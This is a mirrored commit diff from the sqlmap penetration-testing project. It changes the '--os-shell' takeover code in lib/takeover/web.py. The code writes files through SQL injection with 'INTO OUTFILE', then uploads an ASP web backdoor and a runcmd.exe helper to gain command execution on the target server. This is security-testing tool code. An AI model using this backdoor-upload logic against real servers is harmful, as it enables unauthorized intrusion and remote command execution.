sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-23 01:56:36 +03:00
Code Issues Packages Projects Releases Wiki Activity

more updates regarding --os-shell feature

Browse Source
This commit is contained in:
Miroslav Stampar 2010-02-25 12:16:49 +00:00
parent b558712a47
commit 24d3e24db0
2 changed files with 16 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
lib/takeover/web.py
View File

@ -111,7 +111,7 @@ class Web:
def __webFileInject(self, fileContent, fileName, directory): def __webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.normpath("%s/%s" % (directory, fileName)) outFile = posixpath.normpath("%s/%s" % (directory, fileName))
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory) uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
query = agent.prefixQuery(" %s" % query) query = agent.prefixQuery(" %s" % query)
@ -200,12 +200,13 @@ class Web:
logger.info(infoMsg) logger.info(infoMsg)
if self.webApi == "asp": if self.webApi == "asp":
scriptsDirectory = "Scripts"
runcmdName = "tmpe%s.exe" % randomStr(4) runcmdName = "tmpe%s.exe" % randomStr(4)
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
backdoorUploaded = False match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"): if match:
backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory) backdoorDirectory = match.group(1)
else:
continue
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
backdoorStream.file.truncate() backdoorStream.file.truncate()
backdoorStream.read() backdoorStream.read()
@ -213,11 +214,9 @@ class Web:
backdoorStream.write(backdoorContent) backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
self.webDirectory = backdoorDirectory self.webDirectory = backdoorDirectory
backdoorUploaded = True else:
break
if not backdoorUploaded:
continue continue
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory): elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded " warnMsg = "backdoor hasn't been successfully uploaded "

BIN
shell/uploader.asp_
View File

Binary file not shown.